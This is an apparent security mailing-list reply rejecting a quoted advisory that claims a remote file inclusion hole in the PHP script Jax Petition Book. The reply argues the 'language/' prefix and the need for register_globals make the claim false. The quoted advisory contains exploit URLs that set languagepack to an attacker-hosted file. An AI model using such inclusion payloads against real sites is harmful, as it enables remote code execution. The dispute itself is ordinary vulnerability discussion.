This is not a vulnerability. Since $languagepack is prefixed by "language/", the PHP stream handler will simply try to open a local file. Also, you can only modify $languagepack if register_globals is on, which, it rarely is these days. Can we stop with the PHP 'vulnerabilities' that aren't? -Blake Whatchu talkin' 'bout, Willis? > ------------------------------------------------------------------------------------------------------------------ > > AYYILDIZ.ORG PreSents... > > > *Script: Jax Petition Book > *Download: jtr.de/scripting/php/guestbook/petitionbook%20v1.0.3.06.zip > > *Contact: ilker Kandemir <ilkerkandemir[at]mynet.com> > > ------------------------------------------------------------------------------------------------------------------- > > *Code: > > require ( "language/" .$languagepack . ".inc.php" ); > > ------------------------------------------------------------------------------------------------------------------- > > *Exploit: > > jax_petitionbook.php?languagepack=http://attacker.txt? > smileys.php?languagepack=http://attacker.txt? > > ------------------------------------------------------------------------------------------------------------------- > > Tnx:H0tturk,Dr.Max Virus,Asianeagle,PcDelisi,CodeR,Dum?nci > Special Tnx: AYYILDIZ.ORG -- Blake Matheny bmatheny@xxxxxxxxxxxxx http://mobocracy.net
Attachment:
pgpnzQv5uMPev.pgp
Description: PGP signature